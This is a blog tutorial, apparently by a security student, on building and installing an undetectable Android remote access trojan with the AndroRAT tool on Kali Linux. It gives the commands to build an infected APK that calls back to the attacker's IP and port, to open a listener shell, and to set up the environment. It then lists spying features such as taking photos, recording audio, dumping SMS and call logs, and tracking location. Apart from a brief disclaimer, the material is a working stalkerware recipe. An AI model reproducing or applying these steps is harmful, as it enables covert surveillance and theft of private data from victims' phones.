How to hack an Android phone using Kali Linux

French Eagle
5 min readNov 3, 2020

--

How to set up undetectable spyware on an Android phone using Kali Linux.

Photo by Jonathan Kemper on Unsplash

As I was re-watching Mr Robot, the famous realistic hacking TV show, I noticed in an episode how one of the hackers installed spyware on a phone to spy on the phone’s owner.

I wondered, now than android has evolved a lot, is it still possible to hack an android phone without being detected by antiviruses. After some research, I found some interesting results I’m about to share with you in this post. But before, as always…

Disclaimer

I remind you that it’s illegal to attack a device if you don’t have permission to do so. This demonstration is for educational purposes only. In this post, I’ll use my own phone. You shouldn’t try it on someone else.

Understand how a RAT works

First, a little theory before practice. A RAT (remote access Trojan) is malware installed on a target device (usually a phone or a pc). The malware can be installed on the target by the hacker himself, if he can physically access the device, or via an infected app the user installed. The spyware then sends signals to a particular IP. In order to receive the signal, the hacker must set up a listening shell. Then, it waits for a signal to be received. Once a signal is received from the target, the connection is established and the hacker is able to steal data from the device.

Setting up the environment

As always, I’ll use Kali Linux to create the malware and to set up my reverse shell.

For the hypervisor users

If you’re using a VM in a private network, make sure you hypervisor network settings are bridged (Connected to the physical network).

Example of a bridged connection in VMWare Workstation

Setting a static IP

On a local network, we have to set a static IP and tell Kali not to listen to the DHCP. We need to edit the kali network file with nano

sudo nano /etc/network/interfaces

We add our settings under what’s already in the file, save (CTRL+S) and quit (CTRL+X).

auto eth0
iface eth0 inet static
address [The IP you want to give to your kali]/24
gateway [your gateway IP ]

Then, we restart the network service.

sudo systemctl restart networking.service

If you check with ip addr, it should look like this :

Setting up Python

Now, we need to install pip and colorama

sudo apt install python3-pip

Sometimes it is already installed, but just in case it isn’t :

pip install colorama

Setting up Java

Java is already installed in Kali. You just have to set your Java version to Java 8.

sudo update-alternatives --config java

Then choose the number corresponding to java 8 (here 2).

Cloning AndroRat

Clone the AndroRat Project from github

git clone https://github.com/karma9874/AndroRAT.git

Building the infected app

Ok, now that everything is set up, let’s move into the androRat folder and start the program.

cd AndroRAT/

We can build our malware using --build, with -i to indicate our IP, -p the port which the signal will be sent to, and -o the name of the app you’re generating.

python3 androRAT.py --build -i [your_static_ip] -p [your_port] -o [your_app_name].apk

Setting up a listener shell

Once the app is generated, let’s set up the listener. I recommend to execute the shell as root to avoid permissions problems in Kali.

sudo python3 androRAT.py --shell -i [your_static_ip] -p [your_port]

From now on, Kali is waiting for connections. Any person which install the infected app on his phone will connect to us.

Installing the infected app on the target

Let’s install the malware on the target. I’m going to use my phone as the target. As you can see, the app is not detected by the default antivirus. The only shady thing is that the app requires a lot of permissions.

The reverse Shell

Back on our Kali Linux, we’re in the phone via a reverse shell the second the target opened the app. The malware is persistent, which means it will stay even if the user restarts his phone.

Now that we have access to the target, a lot of features are available :

Capture a photo / Video

Dump SMS

We can also get the call logs, vibrate the phone, record audio… and much more, here is the entire list (from https://github.com/karma9874/AndroRAT)

deviceInfo                 --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts a sh shell of the device
vibrate [number_of_times] --> vibrate the device number of time
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter

Conclusion

I am amazed (and a bit scared too) about how simple it was to setup an undetectable RAT on an recent and updated android phone. Sure it requires to do some research and some network knowledge, but it’s far from impossible.

--

--

French Eagle
French Eagle

Written by French Eagle

Cyber security student | My personal website (in french): hackntricks.fr

Responses (4)